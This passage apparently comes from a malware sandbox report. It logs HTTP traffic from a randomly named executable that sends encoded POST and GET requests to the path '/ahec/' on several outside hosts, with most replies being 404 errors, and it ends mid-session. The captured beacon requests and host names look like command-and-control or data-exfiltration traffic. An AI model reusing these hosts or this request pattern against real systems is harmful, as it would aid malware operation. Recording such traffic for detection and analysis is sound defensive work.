                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          31192.168.2.54975081.169.145.70801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:00.942697048 CET1827OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.fam-scharf.net
                                                                          Origin: http://www.fam-scharf.net
                                                                          Referer: http://www.fam-scharf.net/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 6b 46 37 56 6e 36 4f 46 30 59 58 72 56 37 4c 59 75 62 4a 46 48 4f 48 38 48 72 4d 64 6a 2b 33 51 61 48 55 37 6d 68 35 50 72 67 32 6b 31 72 77 30 6d 72 4b 63 48 52 53 73 6f 61 4c 48 50 59 53 36 76 54 78 76 53 36 33 4a 59 77 50 4a 53 68 6c 79 71 79 6c 71 4e 47 56 41 46 59 65 72 45 6f 49 33 62 7a 7a 55 6a 36 6d 42 50 35 54 72 74 76 36 42 6f 7a 41 61 6b 51 47 7a 64 61 75 32 72 58 37 58 4a 4d 66 73 4a 4d 6a 4c 50 2f 41 37 5a 57 65 62 71 47 6b 57 35 55 2b 30 30 35 4d 30 33 71 30 65 69 66 72 2b 4b 4d 2b 6a 6c 67 44 6e 41 71 34 4f 58 30 35 63 36 73 71 61 6c 4b 66 51 47 49 54 38 39 6a 50 50 77 4e 6d 59 42 6d 74 53 67 38 41 49 35 53 76 33 30 32 63 2f 74 6b 34 37 67 63 54 52 34 6d 67 73 4b 56 51 57 4d 50 59 68 6a 4b 55 30 66 6e 6b 49 71 68 54 64 56 46 6e 50 63 71 7a 61 79 37 52 4f 31 39 48 43 52 2f 71 5a 36 31 71 51 58 33 66 67 7a 71 4d 68 37 36 32 4d 57 30 45 58 6c 65 59 34 2f 4b 32 38 44 58 73 79 61 42 5a 51 36 74 2b 74 72 55 73 71 56 32 4e 4d 4f 79 53 30 79 48 78 48 55 53 50 53 57 49 51 4b 37 6f 4f 59 77 79 78 31 71 6b 42 52 44 6a 72 41 74 55 4f 4d 42 78 62 72 42 4f 66 69 49 36 4b 75 4b 4a 6a 7a 43 76 58 77 43 56 50 33 47 72 6a 7a 53 76 49 6a 38 6d 44 69 5a 2b 2b 78 51 58 43 4d 57 4b 6f 4b 62 6d 65 35 4f 32 4b 69 68 68 4e 45 76 33 5a 69 48 51 38 72 77 56 2b 55 6e 45 62 52 6b 46 78 34 35 70 35 56 76 4a 67 56 4c 59 73 4c 63 6b 53 34 66 30 31 4c 4d 57 33 55 65 65 63 42 79 57 35 36 52 46 54 43 77 68 5a 33 46 74 74 65 35 71 7a 32 33 53 69 78 58 58 6f 6b 5a 69 73 66 32 76 41 59 54 4a 4c 56 50 32 78 32 33 49 32 66 58 33 45 4f 32 74 66 67 4e 69 42 4a 4a 38 53 50 50 2f 43 5a 6b 6c 49 72 69 69 62 36 68 76 56 63 4b 49 33 4e 69 54 77 4c 59 46 73 5a 61 73 31 44 54 65 33 7a 7a 4b 6d 39 6d 72 74 72 31 39 48 61 66 66 53 42 4e 4a 36 43 63 38 39 2f 38 44 42 37 77 55 36 39 33 33 54 70 4e 72 34 74 47 57 42 6c 43 75 51 4c 44 79 50 6e 52 56 6b 70 6b 41 2b 74 63 66 66 4c 51 43 64 70 4d 2b 62 2b 65 34 31 53 34 50 77 7a 41 77 37 46 4f 61 35 74 62 73 37 4d 57 4e 6a 4a 4a 4e 41 32 67 4e 47 69 66 41 36 61 62 41 67 59 35 6d 62 44 32 67 6f 79 55 4b 51 76 41 32 68 6f 49 72 37 39 32 4e 56 55 71 69 6d 48 44 55 34 50 6e 70 79 6e 2b 48 72 45 37 75 4d 65 50 54 59 39 64 66 56 62 72 56 64 56 4c 6b 6d 53 77 30 34 39 62 49 61 50 2f 66 45 46 6c 2b 50 48 7a 62 47 59 45 63 49 58 64 56 49 54 68 50 50 64 4f 62 68 72 6e 4a 54 74 46 36 41 4c 6b 6c 6a 70 31 6e 4b 33 4b 56 4b 57 74 30 75 43 63 58 58 6e 62 43 70 76 4e 36 39 36 38 77 6c 56 75 7a 30 74 65 38 53 53 73 6d 35 48 54 7a 31 67 72 38 64 2b 4a 39 5a 6d 73 68 4c 70 32 52 36 54 53 6d 64 48 77 49 50 63 50 4c 4b 37 70 39 4c 7a 71 6d 48 66 75 38 2b 61 73 49 6e 6d 4b 61 4e 33 5a 66 58 63 34 47 53 30 66 48 6a 47 4c 6f 2f 33 77 6d 6c 58 31 79 6c 51 5a 55 37 32 63 78 6a 33 30 44 78 49 79 45 6e 6a 63 55 6d 36 30 52 6d 54 4c 54 79 67 61 6b 7a 72 51 58 65 30 6b 66 71 51 6c 4c 42 7a 51 46 7a 45 41 68 42 6a 74 64 5a 77 53 35 6b 6a 38 74 4e 78 43 30 4a 2b 4b 75 52 45 75 76 4e 5a 77 36 78 47 44 49 78 72 39 76 72 2b 6e 47 59 71 58 41 30 55 6c 6d 51 5a 51 39 65 31 6a 58 44 33 69 69 4c 79 4f 74 68 50 46 51 46 51 6f 6a 6b 35 34 4d 73 2f 61 64 70 39 51 55 35 6a 6f 59 69 65 4a 74 66 67 54 79 4a 44 55 77 6c 75 41 50 67 39 6a 4c 71 6d 63 39 39 68 50 6c 73 6d 49 42 4f 35 42 6c 56 4d 31 35 4e 59 37 6f 6e 69 34 35 63 48 49 48 61 53 78 59 52 62 37 6c 46 6d 4a 4b 38 76 6c 44 39 36 76 5a 63 62 61 35 51 31 73 64 48 46 4e 32 48 6f 45 63 68 34 78 47 72 41 46 41 49 43 67 68 63 64 57 63 55 6a 32 6d 35 41 61 62 2b 45 52 32 44 76 39 55 63 2b 65 66 50 2f 4f 7a 54 61 2f 55 38 73 69 58 2f 55 62 68 43 65 71 65 5a 32 57 67 75 72 37 65 46 4f 56 4e 4a 53 46 4e 44 6d 6f 64 38 37 5a 73 78 76 39 46 51 30 71 37 2f 69
                                                                          Data Ascii: KHcH=kF7Vn6OF0YXrV7LYubJFHOH8HrMdj+3QaHU7mh5Prg2k1rw0mrKcHRSsoaLHPYS6vTxvS63JYwPJShlyqylqNGVAFYerEoI3bzzUj6mBP5Trtv6BozAakQGzdau2rX7XJMfsJMjLP/A7ZWebqGkW5U+005M03q0eifr+KM+jlgDnAq4OX05c6sqalKfQGIT89jPPwNmYBmtSg8AI5Sv302c/tk47gcTR4mgsKVQWMPYhjKU0fnkIqhTdVFnPcqzay7RO19HCR/qZ61qQX3fgzqMh762MW0EXleY4/K28DXsyaBZQ6t+trUsqV2NMOyS0yHxHUSPSWIQK7oOYwyx1qkBRDjrAtUOMBxbrBOfiI6KuKJjzCvXwCVP3GrjzSvIj8mDiZ++xQXCMWKoKbme5O2KihhNEv3ZiHQ8rwV+UnEbRkFx45p5VvJgVLYsLckS4f01LMW3UeecByW56RFTCwhZ3Ftte5qz23SixXXokZisf2vAYTJLVP2x23I2fX3EO2tfgNiBJJ8SPP/CZklIriib6hvVcKI3NiTwLYFsZas1DTe3zzKm9mrtr19HaffSBNJ6Cc89/8DB7wU6933TpNr4tGWBlCuQLDyPnRVkpkA+tcffLQCdpM+b+e41S4PwzAw7FOa5tbs7MWNjJJNA2gNGifA6abAgY5mbD2goyUKQvA2hoIr792NVUqimHDU4Pnpyn+HrE7uMePTY9dfVbrVdVLkmSw049bIaP/fEFl+PHzbGYEcIXdVIThPPdObhrnJTtF6ALkljp1nK3KVKWt0uCcXXnbCpvN6968wlVuz0te8SSsm5HTz1gr8d+J9ZmshLp2R6TSmdHwIPcPLK7p9LzqmHfu8+asInmKaN3ZfXc4GS0fHjGLo/3wmlX1ylQZU72cxj30DxIyEnjcUm60RmTLTygakzrQXe0kfqQlLBzQFzEAhBjtdZwS5kj8tNxC0J+KuREuvNZw6xGDIxr9vr+nGYqXA0UlmQZQ9e1jXD3iiLyOthPFQFQojk54Ms/adp9QU5joYieJtfgTyJDUwluAPg9jLqmc99hPlsmIBO5BlVM15NY7oni45cHIHaSxYRb7lFmJK8vlD96vZcba5Q1sdHFN2HoEch4xGrAFAICghcdWcUj2m5Aab+ER2Dv9Uc+efP/OzTa/U8siX/UbhCeqeZ2Wgur7eFOVNJSFNDmod87Zsxv9FQ0q7/i
                                                                          Dec 2, 2023 18:50:01.144784927 CET428INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:01 GMT
                                                                          Server: Apache/2.4.58 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          32192.168.2.54975181.169.145.70801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:03.661873102 CET518OUTGET /ahec/?Vjk=-N-tntX&KHcH=pHT1kOem2IT0Y9TOyYUVH8n+JKlTpsv3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhVFUxaOpL3PpxqeQ== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.fam-scharf.net
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:03.863384008 CET428INHTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:03 GMT
                                                                          Server: Apache/2.4.58 (Unix)
                                                                          Content-Length: 196
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          33192.168.2.54975285.159.66.93801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:09.670131922 CET794OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.magmadokum.com
                                                                          Origin: http://www.magmadokum.com
                                                                          Referer: http://www.magmadokum.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 4e 46 74 71 31 66 72 4c 33 79 67 31 77 61 43 42 39 61 69 6c 63 6f 64 35 5a 32 32 4e 50 46 44 55 4e 57 54 6b 51 50 4d 63 65 42 75 65 59 39 6e 4e 2f 75 4c 6e 59 69 43 33 6e 66 46 61 45 6d 64 51 56 36 65 46 55 43 61 78 66 67 64 52 70 4c 2f 72 63 77 73 45 42 76 6f 59 6a 72 4f 53 50 44 44 4b 68 4c 77 54 45 34 70 6c 50 56 54 59 37 6f 75 38 46 4b 6f 2f 4e 52 30 78 6e 43 70 4b 61 70 50 46 79 67 75 64 73 6e 55 5a 43 34 38 45 6a 65 76 4d 58 62 63 7a 33 6e 45 56 2f 42 52 77 4e 6b 63 4d 50 38 2b 5a 36 6f 32 64 59 46 32 79 65 52 30 34 47 67 3d 3d
                                                                          Data Ascii: KHcH=NFtq1frL3yg1waCB9ailcod5Z22NPFDUNWTkQPMceBueY9nN/uLnYiC3nfFaEmdQV6eFUCaxfgdRpL/rcwsEBvoYjrOSPDDKhLwTE4plPVTY7ou8FKo/NR0xnCpKapPFygudsnUZC48EjevMXbcz3nEV/BRwNkcMP8+Z6o2dYF2yeR04Gg==
                                                                          Dec 2, 2023 18:50:09.967868090 CET279INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.1
                                                                          Date: Sat, 02 Dec 2023 17:50:09 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          X-Rate-Limit-Limit: 5s
                                                                          X-Rate-Limit-Remaining: 19
                                                                          X-Rate-Limit-Reset: 2023-12-02T17:50:14.8569239Z


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          34192.168.2.54975385.159.66.93801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:12.419315100 CET814OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.magmadokum.com
                                                                          Origin: http://www.magmadokum.com
                                                                          Referer: http://www.magmadokum.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 4e 46 74 71 31 66 72 4c 33 79 67 31 78 36 79 42 2f 39 4f 6c 65 49 64 6d 56 57 32 4e 42 6c 44 59 4e 58 76 6b 51 4f 59 4d 5a 30 47 65 59 66 50 4e 2b 76 4c 6e 64 69 43 33 73 2f 46 54 4a 47 64 58 56 36 43 4e 55 43 57 78 66 68 39 52 70 4c 50 72 66 43 45 48 48 2f 6f 61 33 62 4f 55 4c 44 44 4b 68 4c 77 54 45 37 56 50 50 56 72 59 37 34 65 38 4b 50 63 34 41 78 30 77 78 53 70 4b 4d 70 50 42 79 67 75 46 73 69 77 6a 43 36 45 45 6a 66 66 4d 58 4b 63 30 2b 6e 45 58 67 52 51 63 65 33 68 66 4d 73 75 30 7a 5a 2f 71 59 46 37 47 62 45 59 72 42 56 70 33 75 50 77 43 55 73 4f 38 53 78 58 57 78 75 43 38 6d 47 67 3d
                                                                          Data Ascii: KHcH=NFtq1frL3yg1x6yB/9OleIdmVW2NBlDYNXvkQOYMZ0GeYfPN+vLndiC3s/FTJGdXV6CNUCWxfh9RpLPrfCEHH/oa3bOULDDKhLwTE7VPPVrY74e8KPc4Ax0wxSpKMpPByguFsiwjC6EEjffMXKc0+nEXgRQce3hfMsu0zZ/qYF7GbEYrBVp3uPwCUsO8SxXWxuC8mGg=
                                                                          Dec 2, 2023 18:50:12.704992056 CET279INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.1
                                                                          Date: Sat, 02 Dec 2023 17:50:12 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          X-Rate-Limit-Limit: 5s
                                                                          X-Rate-Limit-Remaining: 18
                                                                          X-Rate-Limit-Reset: 2023-12-02T17:50:14.8569239Z


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          35192.168.2.54975485.159.66.93801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:15.720549107 CET1827OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.magmadokum.com
                                                                          Origin: http://www.magmadokum.com
                                                                          Referer: http://www.magmadokum.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Raw: 4b 48 63 48 3d 4e 46 74 71 31 66 72 4c 33 79 67 31 78 36 79 42 2f 39 4f 6c 65 49 64 6d 56 57 32 4e 42 6c 44 59 4e 58 76 6b 51 4f 59 4d 5a 79 65 65 62 73 33 4e 2f 4d 6a 6e 61 69 43 33 68 66 46 57 4a 47 63 53 56 36 61 4a 55 43 4b 62 66 6b 35 52 6f 6f 48 72 65 7a 45 48 4f 2f 6f 61 31 62 4f 56 50 44 44 6c 68 4c 41 4d 45 37 46 50 50 56 72 59 37 37 47 38 44 36 6f 34 43 78 30 78 6e 43 70 4f 61 70 4f 6d 79 67 32 56 73 6a 77 7a 42 4c 6b 45 74 63 33 4d 57 38 49 30 6d 33 45 76 6a 52 51 45 65 33 73 48 4d 73 43 4f 7a 59 4c 45 59 47 72 47 49 67 4a 53 55 6e 70 72 34 64 49 52 63 50 6d 49 51 52 48 4c 31 38 69 37 35 78 76 41 67 75 49 75 48 67 4b 77 46 35 43 71 38 33 68 4d 4c 2f 34 36 53 42 54 6b 49 64 37 44 4e 76 34 42 6c 4e 6e 2b 43 5a 47 51 7a 47 77 52 63 48 7a 6a 71 49 6f 75 75 2b 2b 37 4d 55 38 61 69 5a 47 5a 41 43 71 6d 2f 7a 57 49 57 75 49 55 46 64 34 4c 51 46 61 31 38 6c 5a 46 79 76 32 76 56 79 6b 35 73 6f 55 42 67 76 48 44 69 45 4c 66 68 2b 69 2f 52 7a 71 30 65 54 61 72 62 4b 4e 46 33 2f 71 54 76 44 7a 6f 43 6d 58 72 4f 70 42 52 48 49 77 30 6e 74 34 61 6c 6f 53 46 45 56 42 37 75 62 31 34 38 49 76 39 77 71 44 64 64 44 55 73 62 49 30 36 6c 2f 4f 68 6c 68 35 45 58 4c 4f 76 6f 49 6f 37 76 5a 45 69 7a 43 37 72 51 50 78 66 59 54 48 36 6b 69 76 7a 76 48 41 61 36 79 39 75 53 42 69 38 52 64 2b 6e 73 69 4e 39 58 33 6c 67 48 69 61 43 77 33 47 50 75 55 41 2b 31 41 77 5a 7a 56 44 36 32 5a 37 79 6a 36 41 57 39 76 46 45 53 76 6d 31 54 53 61 32 5a 4c 51 70 77 35 4c 65 73 55 73 42 30 52 52 43 75 56 44 50 2b 45 32 61 78 61 63 48 4e 50 54 41 74 39 43 6e 69 49 47 67 6f 33 59 49 32 72 4d 33 66 31 6e 61 62 6f 64 52 41 67 78 6b 69 76 62 65 48 79 6a 6b 69 6a 65 67 6e 63 57 46 65 43 36 4b 31 68 38 73 77 49 79 65 6a 4d 70 38 4c 73 56 48 74 31 4b 6f 55 37 36 78 5a 34 51 4b 34 57 4d 6d 67 2b 79 32 6e 48 38 6c 39 55 33 46 68 75 76 61 37 67 50 6b 59 31 30 54 36 6d 77 77 54 65 6d 6d 33 33 4f 64 4f 42 79 70 64 4e 38 6c 6a 79 61 6e 32 53 44 30 49 71 57 71 43 58 7a 36 52 38 36 4b 63 56 42 63 6d 39 58 6a 51 68 42 35 44 6c 74 2f 51 6c 70 34 62 51 34 35 6c 64 2f 6d 72 76 2b 57 66 34 36 35 33 6a 6b 37 6c 75 57 65 6c 56 4d 49 35 6c 70 64 39 70 79 6f 77 67 54 37 5a 7a 46 54 4e 38 53 57 33 61 63 65 64 55 64 31 4e 52 70 6f 58 6b 5a 6a 56 67 52 42 46 7a 6c 48 6a 42 71 2f 58 73 64 4e 51 7a 56 49 30 31 45 76 73 69 30 4f 59 72 58 31 48 51 59 33 6f 62 72 43 36 47 4e 49 49 65 51 7a 78 63 64 2f 44 56 6e 75 4a 66 46 53 62 69 70 64 64 4b 45 6e 77 31 69 75 53 6f 77 78 54 74 32 51 49 6a 61 49 35 6f 2f 66 6f 4c 48 47 46 43 6b 35 76 4c 57 34 54 57 38 6e 36 6a 37 66 4a 71 49 41 37 62 50 5a 63 72 33 7a 6f 69 55 67 78 33 30 56 49 39 39 73 64 32 51 2f 55 59 67 37 52 47 58 42 6b 48 77 55 74 42 4e 35 70 71 6f 64 44 77 36 48 6b 74 6a 55 32 34 4b 32 48 30 34 6e 53 48 64 44 77 76 43 6f 58 46 4d 4f 4f 41 37 47 34 6d 58 51 68 6d 38 65 78 33 37 71 2f 36 45 54 66 4c 72 2b 62 66 30 7a 6f 2b 76 59 4f 64 55 32 48 5a 47 4e 72 41 6b 64 57 36 71 2b 56 67 6b 36 44 4c 62 69 2b 62 77 2f 41 37 77 6d 44 7a 61 49 68 2f 2b 79 6f 4f 4b 4c 68 6d 4d 32 51 52 63 74 59 53 4e 51 47 72 76 31 6e 42 7a 51 70 49 48 41 55 64 70 41 4c 45 70 35 52 41 49 7a 62 6b 32 61 75 43 72 6a 47 31 4d 32 41 57 2b 67 36 70 59 7a 77 4d 51 78 70 5a 70 53 78 64 50 32 6c 34 65 6e 78 56 58 47 56 37 44 38 6a 75 32 6c 39 4c 74 39 43 30 37 75 51 72 66 6a 49 58 35 56 37 63 6a 70 41 64 37 4e 63 4e 79 66 49 46 47 51 53 6c 38 35 7a 52 71 31 77 49 59 62 67 4e 6d 73 6b 56 59 2f 31 58 32 5a 71 41 49 31 54 59 42 46 79 30 78 42 33 77 70 73 45 74 73 74 4a 75 72 56 4b 77 58 54 61 6d 38 6b 55 48 44 4d 4b 48 2f 63 47 63 63 6e 66 4f 4c 63 6d 36 6f 57 4d 50 65 6a 4b 48 58 6e 43 61 59 6b 66 74 42 41 49 4d 55 2b 6a 58 71 46
                                                                          Data Ascii: KHcH=NFtq1frL3yg1x6yB/9OleIdmVW2NBlDYNXvkQOYMZyeebs3N/MjnaiC3hfFWJGcSV6aJUCKbfk5RooHrezEHO/oa1bOVPDDlhLAME7FPPVrY77G8D6o4Cx0xnCpOapOmyg2VsjwzBLkEtc3MW8I0m3EvjRQEe3sHMsCOzYLEYGrGIgJSUnpr4dIRcPmIQRHL18i75xvAguIuHgKwF5Cq83hML/46SBTkId7DNv4BlNn+CZGQzGwRcHzjqIouu++7MU8aiZGZACqm/zWIWuIUFd4LQFa18lZFyv2vVyk5soUBgvHDiELfh+i/Rzq0eTarbKNF3/qTvDzoCmXrOpBRHIw0nt4aloSFEVB7ub148Iv9wqDddDUsbI06l/Ohlh5EXLOvoIo7vZEizC7rQPxfYTH6kivzvHAa6y9uSBi8Rd+nsiN9X3lgHiaCw3GPuUA+1AwZzVD62Z7yj6AW9vFESvm1TSa2ZLQpw5LesUsB0RRCuVDP+E2axacHNPTAt9CniIGgo3YI2rM3f1nabodRAgxkivbeHyjkijegncWFeC6K1h8swIyejMp8LsVHt1KoU76xZ4QK4WMmg+y2nH8l9U3Fhuva7gPkY10T6mwwTemm33OdOBypdN8ljyan2SD0IqWqCXz6R86KcVBcm9XjQhB5Dlt/Qlp4bQ45ld/mrv+Wf4653jk7luWelVMI5lpd9pyowgT7ZzFTN8SW3acedUd1NRpoXkZjVgRBFzlHjBq/XsdNQzVI01Evsi0OYrX1HQY3obrC6GNIIeQzxcd/DVnuJfFSbipddKEnw1iuSowxTt2QIjaI5o/foLHGFCk5vLW4TW8n6j7fJqIA7bPZcr3zoiUgx30VI99sd2Q/UYg7RGXBkHwUtBN5pqodDw6HktjU24K2H04nSHdDwvCoXFMOOA7G4mXQhm8ex37q/6ETfLr+bf0zo+vYOdU2HZGNrAkdW6q+Vgk6DLbi+bw/A7wmDzaIh/+yoOKLhmM2QRctYSNQGrv1nBzQpIHAUdpALEp5RAIzbk2auCrjG1M2AW+g6pYzwMQxpZpSxdP2l4enxVXGV7D8ju2l9Lt9C07uQrfjIX5V7cjpAd7NcNyfIFGQSl85zRq1wIYbgNmskVY/1X2ZqAI1TYBFy0xB3wpsEtstJurVKwXTam8kUHDMKH/cGccnfOLcm6oWMPejKHXnCaYkftBAIMU+jXqF
                                                                          Dec 2, 2023 18:50:16.005774021 CET279INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.1
                                                                          Date: Sat, 02 Dec 2023 17:50:15 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          X-Rate-Limit-Limit: 5s
                                                                          X-Rate-Limit-Remaining: 19
                                                                          X-Rate-Limit-Reset: 2023-12-02T17:50:20.8952429Z


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          36192.168.2.54975585.159.66.93801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:18.465579987 CET518OUTGET /ahec/?KHcH=AHFK2pjoxw5zzLKjgIeieoxyeFKGBXiFIXzrT8sRZEqLGYv6y8nhVjDsidhHFHxwb+HDFiGiPRNZnrHWQBMiJvE3/6rCIhWfjw==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.magmadokum.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:18.691795111 CET279INHTTP/1.1 404 Not Found
                                                                          Server: nginx/1.14.1
                                                                          Date: Sat, 02 Dec 2023 17:50:18 GMT
                                                                          Content-Length: 0
                                                                          Connection: close
                                                                          X-Rate-Limit-Limit: 5s
                                                                          X-Rate-Limit-Remaining: 19
                                                                          X-Rate-Limit-Reset: 2023-12-02T17:50:23.5807063Z


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          37192.168.2.549756162.241.252.161801600C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2023 18:50:24.291728020 CET812OUTPOST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
